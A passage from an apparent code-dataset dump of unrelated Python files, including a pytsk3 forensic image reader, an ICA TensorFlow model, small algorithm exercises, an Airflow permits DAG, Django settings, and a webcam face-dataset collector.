affuse) we do not assume that the images\n are the same size.\n \"\"\"\n\n def __init__(self, *files):\n self.fds = []\n self.offsets = [0]\n offset = 0\n\n for fd in files:\n # Support either a filename or file like objects\n if not hasattr(fd, \"read\"):\n fd = open(fd, \"rb\")\n\n fd.seek(0,2)\n\n offset += fd.tell()\n self.offsets.append(offset)\n self.fds.append(fd)\n\n self.size = offset\n\n # Make sure to call the original base constructor.\n pytsk3.Img_Info.__init__(self, \"\")\n\n def get_size(self):\n return self.size\n\n def read(self, offset, length):\n \"\"\"\n Read a buffer from the split image set.\n Handles the buffer straddling images.\n \"\"\"\n result = \"\"\n\n # The total available size in the file\n length = int(length)\n length = min(length, int(self.size) - offset)\n\n while length > 0:\n data = self._ReadPartial(offset, length)\n if not data: break\n\n length -= len(data)\n result += data\n offset += len(data)\n\n return result\n\n def _ReadPartial(self, offset, length):\n \"\"\"Read as much as we can from the current image.\"\"\"\n # The part we need to read from.\n idx = bisect.bisect_right(self.offsets, offset + 1) - 1\n fd = self.fds[idx]\n\n # The offset this part is in the overall image\n img_offset = self.offsets[idx]\n fd.seek(offset - img_offset)\n\n # This can return less than length\n return fd.read(length)\n\ndef SelectImage(img_type, files):\n if img_type == \"raw\":\n return pytsk3.Img_Info(files)\n\n elif img_type == \"ewf\":\n filename = pyewf.glob(*files)\n ewf_handle = pyewf.handle()\n ewf_handle.open(filename)\n return ewf_img_info(ewf_handle)\n \n elif img_type == \"vmdk\":\n vmdk_handle = pyvmdk.handle()\n vmdk_handle.open(files)\n return vmdk_img_info(vmdk_handle)\n\n elif img_type == \"vhdi\":\n vhdi_handle = pyvhdi.file()\n vhdi_handle.open(files)\n return vhdi_img_info(vhdi_handle)\n\n elif img_type == \"qcow\":\n return QcowImgInfo(files[0])\n \n''' \n elif img_type == \"aff\":\n aff_handle = pyaff.handle()\n'''","sub_path":"filesystem_analyzer/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211010325","text":"import numpy as np\nimport logging\nimport json as js\nimport tensorflow as tf\nimport utils.plot_functions as pf\nfrom models.base_model import Model\n\nclass ICA(Model):\n def __init__(self, params, schedule):\n Model.__init__(self, params, schedule)\n self.build_graph()\n Model.setup_graph(self, self.graph)\n\n \"\"\"\n Load parameters into object\n Inputs:\n params: [dict] model parameters\n Modifiable Parameters:\n norm_weights [bool] If set, l2 normalize weights after updates\n prior [str] Prior for ICA - can be \"laplacian\" or \"cauchy\"\n batch_size [int] Number of images in a training batch\n num_pixels [int] Number of pixels\n \"\"\"\n def load_params(self, params):\n Model.load_params(self, params)\n # Meta parameters\n self.norm_weights = bool(params[\"norm_weights\"])\n self.prior = str(params[\"prior\"])\n assert (True if self.prior.lower() in (\"laplacian\", \"cauchy\") else False), (\n \"Prior must be 'laplacian' or 'cauchy'\")\n # Network Size\n self.batch_size = int(params[\"batch_size\"])\n self.num_pixels = int(params[\"num_pixels\"])\n self.num_neurons = self.num_pixels\n self.a_shape = [self.num_pixels, self.num_neurons]\n\n \"\"\"Check parameters with assertions\"\"\"\n def check_params(self):\n Model.check_params(self)\n assert np.sqrt(self.num_pixels) == 
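Every wrapper in images.py above follows one contract: subclass `pytsk3.Img_Info` with `type=TSK_IMG_TYPE_EXTERNAL` and override `close`/`read`/`get_size` so The Sleuth Kit pulls bytes through the backing reader. A generic sketch of that adapter over any seekable file-like handle (illustrative; it mirrors the record's per-format classes):

import pytsk3

class FileLikeImgInfo(pytsk3.Img_Info):
    """Adapter exposing any seekable file-like object to TSK."""

    def __init__(self, fileobj, size):
        self._fileobj = fileobj
        self._size = size
        super(FileLikeImgInfo, self).__init__(
            url="", type=pytsk3.TSK_IMG_TYPE_EXTERNAL)

    def close(self):
        self._fileobj.close()

    def read(self, offset, size):
        self._fileobj.seek(offset)
        return self._fileobj.read(size)

    def get_size(self):
        return self._size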
np.floor(np.sqrt(self.num_pixels)), (\n \"The parameter `num_pixels` must have an even square-root.\")\n\n \"\"\"Build the TensorFlow graph object\"\"\"\n def build_graph(self):\n self.graph = tf.Graph()\n with tf.device(self.device):\n with self.graph.as_default():\n with tf.name_scope(\"placeholders\") as scope:\n self.x = tf.placeholder(\n tf.float32, shape=[self.num_pixels, None], name=\"input_data\")\n\n with tf.name_scope(\"step_counter\") as scope:\n self.global_step = tf.Variable(0, trainable=False, name=\"global_step\")\n\n with tf.variable_scope(\"weights\") as scope:\n self.a = tf.get_variable(name=\"a\", dtype=tf.float32,\n initializer=tf.truncated_normal(self.a_shape, mean=0.0,\n stddev=1.0, dtype=tf.float32, name=\"a_init\"), trainable=True)\n\n with tf.name_scope(\"normalize_weights\") as scope:\n self.norm_a = self.a.assign(tf.nn.l2_normalize(self.a,\n dim=0, epsilon=self.eps, name=\"row_l2_norm\"))\n self.normalize_weights = tf.group(self.norm_a,\n name=\"l2_normalization\")\n\n with tf.name_scope(\"inference\") as scope:\n self.u = tf.matmul(tf.matrix_inverse(self.a, name=\"a_inverse\"),\n self.x, name=\"coefficients\")\n if self.prior.lower() == \"laplacian\":\n self.z = tf.sign(self.u)\n else: #It must be laplacian or cauchy, assert in load_params()\n self.z = (2*self.u) / (1 + tf.pow(self.u, 2.0))\n\n self.graph_built = True\n\n \"\"\"\n Returns the gradients for a weight variable\n NOTE:\n This child function does not use optimizer input\n Weights must be a list with a single matrix (\"a\") in it\n \"\"\"\n def compute_gradients(self, optimizer, weight_op=None):\n assert len(weight_op) == 1, (\"ICA should only have one weight matrix\")\n z_avg = tf.div(tf.matmul(self.z, tf.transpose(self.u)),\n tf.to_float(tf.shape(self.x)[1]), name=\"avg_samples\")\n weight_name = weight_op[0].name.split('/')[1].split(':')[0]\n gradient = tf.sub(tf.matmul(weight_op[0], z_avg), weight_op[0],\n name=weight_name+\"_gradient\")\n return [(gradient, weight_op[0])]\n\n \"\"\"\n input_data: data object containing the current image batch\n input_labels: data object containing the current label batch\n batch_step: current batch number within the schedule\n NOTE: Casting tf.eval output to an np.array and then to a list is required to\n ensure that the data type is valid for js.dumps(). 
An alternative would be\n to write an np function that converts numpy types to their corresponding\n python types.\n \"\"\"\n def print_update(self, input_data, input_labels=None, batch_step=0):\n Model.print_update(self, input_data, input_labels, batch_step)\n feed_dict = self.get_feed_dict(input_data, input_labels)\n current_step = np.array(self.global_step.eval()).tolist()\n u_vals = tf.get_default_session().run(self.u, feed_dict)\n u_vals_max = np.array(u_vals.max()).tolist()\n u_frac_act = np.array(np.count_nonzero(u_vals)\n / float(self.num_neurons * self.batch_size)).tolist()\n stat_dict = {\"global_batch_index\":current_step,\n \"batch_step\":batch_step,\n \"number_of_batch_steps\":self.get_sched(\"num_batches\"),\n \"schedule_index\":self.sched_idx,\n \"u_max\":u_vals_max,\n \"u_fraction_active\":u_frac_act}\n for weight_grad_var in self.grads_and_vars[self.sched_idx]:\n grad = weight_grad_var[0][0].eval(feed_dict)\n name = weight_grad_var[0][1].name.split('/')[1].split(':')[0]\n stat_dict[name+\"_max_grad\"] = np.array(grad.max()).tolist()\n stat_dict[name+\"_min_grad\"] = np.array(grad.min()).tolist()\n js_str = js.dumps(stat_dict, sort_keys=True, indent=2)\n self.log_info(\"\"+js_str+\"\")\n\n \"\"\"\n Plot weights, reconstruction, and gradients\n Inputs:\n input_data: data object containing the current image batch\n input_labels: data object containing the current label batch\n \"\"\"\n def generate_plots(self, input_data, input_labels=None):\n Model.generate_plots(self, input_data, input_labels)\n feed_dict = self.get_feed_dict(input_data, input_labels)\n current_step = str(self.global_step.eval())\n pf.save_data_tiled(input_data.T.reshape((self.batch_size,\n np.int(np.sqrt(self.num_pixels)),\n np.int(np.sqrt(self.num_pixels)))),\n normalize=False, title=\"Images at step \"+current_step,\n save_filename=(self.disp_dir+\"images_\"\n +current_step.zfill(5)+\".pdf\"),\n vmin=np.min(input_data), vmax=np.max(input_data))\n pf.save_data_tiled(\n tf.transpose(self.a).eval().reshape(self.num_neurons,\n int(np.sqrt(self.num_pixels)), int(np.sqrt(self.num_pixels))),\n normalize=True, title=\"Dictionary at step \"+current_step,\n save_filename=(self.disp_dir+\"a_v\"+self.version+\"-\"\n +current_step.zfill(5)+\".pdf\"))\n for weight_grad_var in self.grads_and_vars[self.sched_idx]:\n grad = weight_grad_var[0][0].eval(feed_dict)\n shape = grad.shape\n name = weight_grad_var[0][1].name.split('/')[1].split(':')[0]\n pf.save_data_tiled(grad.T.reshape(self.num_neurons,\n int(np.sqrt(self.num_pixels)), int(np.sqrt(self.num_pixels))),\n normalize=True, title=\"Gradient for \"+name+\" at step \"+current_step,\n save_filename=(self.disp_dir+\"d\"+name+\"_v\"+self.version+\"_\"\n +current_step.zfill(5)+\".pdf\"))\n","sub_path":"models/ica.py","file_name":"ica.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"148272745","text":"def perrin(n):\n if n == 0:\n return 3\n elif n == 1:\n return 0\n elif n == 2:\n return 2\n return perrin(n-2) + perrin(n-3)\n\nprint(perrin(1)) \nprint(perrin(8)) \nprint(perrin(26)) ","sub_path":"Edabit/อ๋า-20210505T210557Z-001/อ๋า/edabit/the perrin sequence.py","file_name":"the perrin sequence.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574535524","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n Для кодування повідомлень Френсіс Бекон запропонував кожну 
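The `compute_gradients` method of the ICA model above implements the natural-gradient-style update dA = A (E[z u^T]) - A, with u = A^{-1} x and z the prior score (sign(u) for the Laplacian prior). A numpy sketch of one step, with made-up shapes (square mixing matrix, batch of 128 samples):

import numpy as np

rng = np.random.default_rng(0)
A = rng.normal(size=(16, 16))            # mixing matrix (num_pixels == num_neurons)
x = rng.normal(size=(16, 128))           # batch of whitened patches (made up)

u = np.linalg.inv(A) @ x                 # coefficients, as in the inference scope
z = np.sign(u)                           # Laplacian prior score
grad = A @ (z @ u.T / x.shape[1]) - A    # the record's tf.matmul(a, z_avg) - a
A -= 0.01 * grad                         # one gradient-descent step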
літеру тексту замінювати на групу з п'яти символів «А» або «B» (назвемо їх \"ab-групами\"). Для співставлення літер і кодуючих ab-груп в даному завданні використовується ключ-ланцюжок aaaaabbbbbabbbaabbababbaaababaab, в якому порядковий номер літери відповідає порядковому номеру початку ab-групи.\n Літера \"а\" - перша літера алфавіту; для визначення її коду беремо 5 символів з ключа, починаючи з першого: aaaaa. Літера \"c\" - третя в алфавіті, отже для визначення її коду беремо 5 символів з ключа, починаючи з третього: aaabb.\nВхідні дані:\n Рядок, передається в програму як аргумент командного рядка. Може містити пробіли та літери латинського алфавіту в будь-якому регістрі. Для передачі в якості одного аргументу рядок береться в подвійні лапки.\nВихідні дані:\n Рядок - дешифроване повідомлення.\nПриклад:\n Вхідні дані: I canT DAnCE i CANt TAlK Hey\n Результат: wiki\n Вхідні дані: Hot sUn BEATIng dOWN bURNINg mY FEet JuSt WalKIng arOUnD HOt suN mAkiNG me SWeat\n Результат: wewillrockyou\n'''\n\nimport sys, re\n\nkey = 'aaaaabbbbbabbbaabbababbaaababaab'\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\n\ndic = {}\ndecrypted = ''\n\nfor i in range(len(alphabet)):\n dic[key[i:i+5]] = alphabet[i]\n\nencrypted = re.findall('.{5}', sys.argv[1].replace(' ', ''))\n\nfor word in encrypted:\n token = ''\n for letter in word:\n if letter.islower():\n token += 'a'\n else:\n token += 'b'\n decrypted += dic[token]\n\nprint(decrypted)\n\n","sub_path":"lesson_04_M.py","file_name":"lesson_04_M.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"472925371","text":"import logging\nimport unittest\n\n\n\"\"\"MaxProfit (https://codility.com/demo/take-sample-test/max_profit/)\n\nAnalysis:\n - change delta\n - change lower bound value\n\"\"\"\n\n__author__ = 'au9ustine'\nlogging.basicConfig(format='%(message)s', level=logging.DEBUG)\n\n\ndef solution(A):\n if len(A) < 2:\n return 0\n profit = 0\n price_lower_bound = A[0]\n for i in xrange(1, len(A)):\n profit = max(profit, A[i] - price_lower_bound)\n price_lower_bound = min(A[i], price_lower_bound)\n return profit\n\n\nclass SolutionTest(unittest.TestCase):\n\n def setUp(self):\n self.data = [\n ([23171, 21011, 21123, 21366, 21013, 21367], 356)\n ]\n\n def test_solution(self):\n for input_data, expected in self.data:\n actual = solution(input_data)\n self.assertEquals(expected, actual)\n\nif __name__ == \"__main__\":\n unittest.main(failfast=True)","sub_path":"lessons/lesson07_maximum_slice_problem/MaxProfit.py","file_name":"MaxProfit.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"635562803","text":"#!/usr/bin/env python\n\n\"\"\"\nSpatial analysis of lung tissue\n\"\"\"\n\nfrom typing import Union\n\nimport parmap\nimport scipy.ndimage as ndi\nimport skimage as ski\nimport skimage.feature\nfrom skimage.exposure import equalize_hist as eq\nimport tifffile\nimport pingouin as pg\nimport numpy_groupies as npg\nfrom anndata import AnnData\nimport scanpy as sc\n\nfrom imc.types import Path, Array\n\nfrom src.config import *\n\n\noutput_dir = results_dir / \"supervised\"\noutput_dir.mkdir()\n\n\nprj.sample_comparisons(\n sample_attributes=roi_attributes.columns[:2].tolist(),\n output_prefix=output_dir / \"comparisons.\",\n channel_exclude=channels_exclude,\n)\n\n\ndf = prj.clusters.reset_index()\nc = df[\"cluster\"].value_counts()\nc = c[c > 500].index.tolist()\n\ndf = 
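A worked trace of the Bacon decoder above on its first example: letter case is the only signal, so the first four 5-character groups of "I canT DAnCE i CANt TAlK Hey" (spaces removed) become the ab-groups below, which the key chain maps back to "wiki":

key = 'aaaaabbbbbabbbaabbababbaaababaab'
alphabet = 'abcdefghijklmnopqrstuvwxyz'
dic = {key[i:i + 5]: alphabet[i] for i in range(len(alphabet))}

# 'IcanT' -> baaab, 'DAnCE' -> bbabb, 'iCANt' -> abbba, 'TAlKH' -> bbabb
for group in ('baaab', 'bbabb', 'abbba', 'bbabb'):
    print(dic[group], end='')   # wiki
print()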
df.loc[df[\"cluster\"].isin(c)]\ndf = df.loc[~df[\"cluster\"].isin([\"?\", \"\"])]\n\ndf = df.merge(roi_attributes, left_on=\"roi\", right_index=True)\n\nperc = (\n df.groupby(\"roi\")\n .apply(lambda x: (x[\"cluster\"].value_counts() / x.shape[0]) * 100)\n .rename(\"percentage\")\n)\nperc = roi_attributes.join(perc)\nperc.index.names = [\"roi\", \"cluster\"]\n\n\n# grid = sns.catplot(\n# data=perc.reset_index(),\n# x=\"cluster\",\n# y=\"percentage\",\n# hue=attr,\n# kind=\"boxen\",\n# )\n\n_test_res = list()\nfor attr in roi_attributes.columns:\n # Test for differences\n aov = pd.concat(\n [\n pg.anova(\n data=perc.loc[perc.index.get_level_values(1) == val],\n dv=\"percentage\",\n between=attr,\n ).assign(variable=val)\n for val in perc.index.levels[1]\n ]\n ).set_index(\"variable\")\n _test_res.append(aov)\n\n kws = dict(\n data=perc.reset_index(), x=attr, y=\"percentage\", palette=\"tab10\",\n )\n grid = sns.FacetGrid(\n data=perc.reset_index(),\n col=\"cluster\",\n height=3,\n col_wrap=4,\n sharey=False,\n )\n grid.map_dataframe(sns.boxenplot, saturation=0.5, dodge=False, **kws)\n for ax in grid.axes.flat:\n [\n x.set_alpha(0.25)\n for x in ax.get_children()\n if isinstance(\n x,\n (\n matplotlib.collections.PatchCollection,\n matplotlib.collections.PathCollection,\n ),\n )\n ]\n grid.map_dataframe(sns.swarmplot, **kws)\n for ax in grid.axes.flat:\n ax.set_xticklabels(ax.get_xticklabels(), rotation=90)\n # for ax in grid.axes.flat:\n # if ax.get_title().endswith(\"_number\"):\n # ax.set_yscale(\"log\")\n for ax in grid.axes.flat:\n var = ax.get_title().replace(\"cluster = \", \"\")\n f = aov.loc[var, \"F\"]\n p = aov.loc[var, \"p-unc\"]\n stats = f\"\\nF = {f:.3f}; p = {p:.3e}\"\n ax.set_title(var + stats)\n\n grid.savefig(\n output_dir / f\"differential_cell_types.{attr}.boxen_swarm_plot.svg\",\n **figkws,\n )\n plt.close(grid.fig)\n\n\ntest_res = pd.concat(_test_res)\ntest_res.to_csv(output_dir / \"differential_cell_types.anova_test_results.csv\")\n","sub_path":"src/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"173989445","text":"#\n# Copyright 2021 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n#\n\n\"\"\"\nThis module holds following default values for Gas price, Gas limit and more.\n\n\"\"\"\n\nENV_GAS_PRICE = \"GAS_PRICE\"\nENV_MAX_GAS_PRICE = \"MAX_GAS_PRICE\"\n\nGAS_LIMIT_DEFAULT = 1000000\nMIN_GAS_PRICE = 1000000000\n\nZERO_ADDRESS = \"0x0000000000000000000000000000000000000000\"\n\nDEFAULT_NETWORK_NAME = \"ganache\"\nNETWORK_NAME_MAP = {\n 1: \"Mainnet\",\n 3: \"Ropsten\",\n 4: \"Rinkeby\",\n 56: \"Binance Smart Chain\",\n 137: \"Polygon\",\n 1337: \"Ganache\",\n}\n\nNETWORK_TIMEOUT_MAP = {\n \"mainnet\": 10 * 60,\n \"ropsten\": 10 * 60,\n \"rinkeby\": 5 * 60,\n \"bsc\": 10 * 60,\n \"polygon\": 10 * 60,\n \"ganache\": 2,\n}\n","sub_path":"ocean_lib/web3_internal/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"609900443","text":"import Stem\n\n\nclass StopList:\n def __init__(self):\n self.list = Stem.stem(['', 'a', 'all', 'and', 'are', 'at', 'be', 'been', 'but',\n 'decided', 'do', 'eat', 'few',\n 'for', 'from', 'get', 'go', 'had', 'have', 'he', 'here', 'if', 'in',\n 'into', 'is', 'ive', 'it', 'item', 'items', 'keep', 'menu', 'my',\n 'next', 'of', 'she', 'some',\n 'than', 'that', 
'the', 'there',\n 'them', 'they', 'this', 'til', 'till', 'to', 'until', 'up',\n 'what', 'when', 'where',\n 'who', 'with', 'write', 'you', 'your'])\n\n self.list2 = Stem.stem(['', ' ', 'i', 'me', 'mine', 'he', 'she', 'it', 'a', 'an', 'the',\n 'above', 'below', 'while', 'as', 'until', 'of', 'at',\n 'down', 'if', 'to', 'or', 'was', 'were', 'itself', 'for',\n 'other', 'both', 'any', 'all', 'between', 'do', 'does',\n 'did', 'on', 'own', 'who', 'whom', 'this', 'that', 'has',\n 'have', 'here', 'some', 'why', 'same',\n 'so', 'is', 'be'])\n\n # maybe add:\n","sub_path":"StopList.py","file_name":"StopList.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"615903869","text":"\"\"\"DSD Permits _dags file.\"\"\"\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom airflow.models import DAG\nfrom trident.util import general\nfrom trident.util.notifications import afsys_send_email\nfrom dags.permits.permits_jobs import *\nfrom dags.permits.permits_subdags import *\n\nfrom trident.util.seaboard_updates import *\nconf = general.config\nargs = general.args\nschedule = general.schedule['dsd_approvals']\nstart_date = general.start_date['dsd_approvals']\n\n#: Dag spec for dsd permits\ndag = DAG(dag_id='dsd_permits',\n default_args=args,\n start_date=start_date,\n schedule_interval=schedule,\n catchup=False)\n\n#: Join BIDs to 4 files using subdag\nall_accela = SubDagOperator(\n task_id='get_create_accela',\n subdag=get_create_accela_subdag(),\n dag=dag)\n\n#: Subset files\nall_pts = SubDagOperator(\n task_id='get_create_pts',\n subdag=get_create_pts_subdag(),\n dag=dag)\n\nexec_snowflake = SubDagOperator(\n task_id=\"snowflake\",\n subdag=snowflake_subdag(),\n dag=dag)\n\n#: Upload 4 files using subdag\nupload_set1_files = SubDagOperator(\n task_id='upload_set1_files',\n subdag=upload_set1_files_subdag(),\n dag=dag)\n\n#: Upload 4 files using subdag\nupload_set2_files = SubDagOperator(\n task_id='upload_set2_files',\n subdag=upload_set2_files_subdag(),\n dag=dag)\n\nupdate_set1_md = get_seaboard_update_dag('development-permits-set1.md', dag)\nupdate_set2_md = get_seaboard_update_dag('development-permits-set2.md', dag)\n\n#: Update data inventory json\nupdate_set1_json_date = PythonOperator(\n task_id='update_set1_json_date',\n python_callable=update_json_date,\n provide_context=True,\n op_kwargs={'ds_fname': 'development-permits-set1'},\n dag=dag)\n\n#: Update data inventory json\nupdate_set2_json_date = PythonOperator(\n task_id='update_set2_json_date',\n python_callable=update_json_date,\n provide_context=True,\n op_kwargs={'ds_fname': 'development-permits-set2'},\n dag=dag)\n\n#: Create TSW subset\ncreate_tsw_file = PythonOperator(\n task_id='create_tsw',\n python_callable=create_tsw_subset,\n dag=dag)\n\n#: Create PW subset\ncreate_pw_sap_file = PythonOperator(\n task_id='create_pw_sap',\n python_callable=create_pw_sap_subset,\n dag=dag)\n\n# Upload TSW subset\nupload_tsw = S3FileTransferOperator(\n task_id=\"upload_tsw_subset\",\n source_base_path=conf['prod_data_dir'],\n source_key=f\"dsd_permits_row.csv\",\n dest_s3_bucket=\"{{ var.value.S3_DATA_BUCKET }}\",\n dest_s3_conn_id=\"{{ var.value.DEFAULT_S3_CONN_ID }}\",\n dest_s3_key=f\"tsw/dsd_permits_row.csv\",\n replace=True,\n dag=dag)\n\n# Upload TSW subset\nupload_pw_sap = S3FileTransferOperator(\n task_id=\"upload_pw_subset\",\n source_base_path=conf['prod_data_dir'],\n 
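The StopList above stems its word lists up front so lookups can compare stemmed tokens directly. A sketch of the usual membership filter built on such a list (a plain set stands in for the record's `Stem.stem` output to keep this self-contained):

stop = {'the', 'a', 'of', 'to'}   # stand-in for the record's stemmed lists

def remove_stopwords(tokens):
    return [t for t in tokens if t.lower() not in stop]

print(remove_stopwords(['The', 'menu', 'of', 'items']))   # ['menu', 'items']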
source_key=f\"dsd_permits_public_works.csv\",\n dest_s3_bucket=\"{{ var.value.S3_DATA_BUCKET }}\",\n dest_s3_conn_id=\"{{ var.value.DEFAULT_S3_CONN_ID }}\",\n dest_s3_key=f\"dsd/dsd_permits_public_works.csv\",\n replace=True,\n dag=dag,\n )\n\n#: Execution rules\nall_accela>>exec_snowflake\nall_pts>>exec_snowflake\nall_accela>>upload_set2_files\nall_pts>>upload_set1_files\nupload_set1_files>>[update_set1_md,update_set1_json_date]\nupload_set2_files>>[update_set2_md,update_set2_json_date]\nall_accela>>[create_tsw_file,create_pw_sap_file]\nall_pts>>[create_tsw_file,create_pw_sap_file]\ncreate_tsw_file>>upload_tsw\ncreate_pw_sap_file>>upload_pw_sap\n","sub_path":"poseidon/dags/permits/permits_dags.py","file_name":"permits_dags.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416146078","text":"# ============================================================================\n# FILE: line.py\n# AUTHOR: Shougo Matsushita \n# License: MIT license\n# ============================================================================\n\nfrom .base import Base\n\nLINE_NUMBER_SYNTAX = (\n 'syntax match deniteSource_lineNumber '\n r'/\\d\\+\\(:\\d\\+\\)\\?/ '\n 'contained containedin=')\nLINE_NUMBER_HIGHLIGHT = 'highlight default link deniteSource_lineNumber LineNR'\n\n\nclass Source(Base):\n\n def __init__(self, vim):\n super().__init__(vim)\n\n self.name = 'line'\n self.kind = 'file'\n self.matchers = ['matcher_regexp']\n self.sorters = []\n\n def on_init(self, context):\n context['__linenr'] = self.vim.current.window.cursor[0]\n context['__bufname'] = self.vim.current.buffer.name\n context['__bufnr'] = self.vim.current.buffer.number\n context['__direction'] = 'all'\n context['__fmt'] = '%' + str(len(\n str(self.vim.call('line', '$')))) + 'd: %s'\n if context['args'] and (context['args'][0] == 'all' or\n context['args'][0] == 'forward' or\n context['args'][0] == 'backward'):\n context['__direction'] = context['args'][0]\n\n def highlight(self):\n self.vim.command(LINE_NUMBER_SYNTAX + self.syntax_name)\n self.vim.command(LINE_NUMBER_HIGHLIGHT)\n\n def gather_candidates(self, context):\n linenr = context['__linenr']\n lines = [{'word': x,\n 'abbr': (context['__fmt'] % (i + 1, x)),\n 'action__path': context['__bufname'],\n 'action__line': (i + 1)}\n for [i, x] in\n enumerate(self.vim.call(\n 'getbufline', context['__bufnr'], 1, '$'))]\n if context['__direction'] == 'all':\n return lines\n elif context['__direction'] == 'backward':\n return list(reversed(lines[:linenr])) + list(\n reversed(lines[linenr:]))\n else:\n return lines[linenr-1:] + lines[:linenr-1]\n","sub_path":"sources_non_forked/denite.nvim/rplugin/python3/denite/source/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"469643032","text":"import yaml\n\ntry:\n file = open('config.yaml', 'r')\n config = yaml.load(file, Loader=yaml.FullLoader)\nexcept FileNotFoundError as e:\n print('Config file not found! 
Make sure you have config.yaml in the project directory')\n raise e\n\nDEBUG = True\n\nDATABASES = {'default': config['DATABASES']['POSTGRES']}\n","sub_path":"traitcuration/settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"127558376","text":"import tensorflow as tf\nimport numpy as np\n\nfrom ops import *\n\nhe_init = tf.contrib.layers.variance_scaling_initializer\n\nclass Autoencoder():\n ''' Autoencoder including encode, decode networks. '''\n def __init__(self, img_shape=(64, 64, 3), zsize=128):\n # Input image shape: x, y, channels\n self.img_shape = img_shape\n # latent (z) vector length\n self.zsize = zsize\n self.g_bns = [\n batch_norm(name='g_bn{}'.format(i,)) for i in range(6)]\n\n def generator(self, inputs, training, scope='generator', reuse=None):\n with tf.variable_scope(scope, reuse=reuse):\n \n # self.gf_dim = 64\n\n self.z_, self.h0_w, self.h0_b = linear(inputs, 8192, 'g_h0_lin', with_w=True)\n # self.z_ = tf.layers.dense(inputs, 8192, kernel_initializer=he_init())\n \n hs = [None]\n hs[0] = tf.reshape(self.z_, [-1, 4, 4, 512])\n hs[0] = tf.nn.relu(self.g_bns[0](hs[0], training))\n\n i = 1 # Iteration number.\n depth_mul = 8 # Depth decreases as spatial component increases.\n size = 8 # Size increases as depth decreases.\n\n while size < 64:\n hs.append(None)\n name = 'g_h{}'.format(i)\n hs[i], _, _ = conv2d_transpose(hs[i-1],\n [64, size, size, 64*depth_mul], name=name, with_w=True)\n hs[i] = tf.nn.relu(self.g_bns[i](hs[i], training))\n\n i += 1\n depth_mul //= 2\n size *= 2\n\n hs.append(None)\n name = 'g_h{}'.format(i)\n hs[i], _, _ = conv2d_transpose(hs[i - 1],\n [64, size, size, 3], name=name, with_w=True)\n \n return tf.nn.tanh(hs[i])\n\n\n\n","sub_path":"autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"393883182","text":"import numpy as np\nimport cv2\n#create haar cascade classifier\ndetector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#start webcam\ncap = cv2.VideoCapture(0)\n#ask user for the id of the face it wants to store in dataset\nid = raw_input('enter user id: ')\nsamplenum = 0\nwhile(True):\n\t#capture webcam image\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #detect faces in the image\n faces = detector.detectMultiScale(gray, 1.3, 5)\n #store the faces in the dataset and include the user id in the filepath\n if(len(faces)!=0):\n for (x,y,w,h) in faces:\n samplenum = samplenum + 1\n cv2.imwrite(\"dataSet/User.\"+str(id)+\".\"+str(samplenum)+\".jpg\",gray[y:y+h,x:x+w])\n #draw a rectangle around the detected face\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n cv2.waitKey(100)\n cv2.imshow('face',img)\n cv2.waitKey(1)\n #we take 301 sample images\n if(samplenum > 300) :\n break \ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"datasetCreator.py","file_name":"datasetCreator.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"166583850","text":"import subprocess\nimport os\nfrom os import listdir\nfrom os.path import join, isfile, isdir\nfrom subprocess import call\nfrom tqdm import tqdm\nimport cv2\nfrom PIL import Image\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument('--train', 
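The settings module above reads its config with `yaml.load(..., Loader=yaml.FullLoader)`; a sketch of the equivalent, more conventional `safe_load` with the same missing-file handling (config.yaml is the path the record assumes):

import yaml

try:
    with open('config.yaml') as fh:          # same path the record assumes
        config = yaml.safe_load(fh)
except FileNotFoundError:
    raise SystemExit('Config file not found! Make sure you have '
                     'config.yaml in the project directory')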
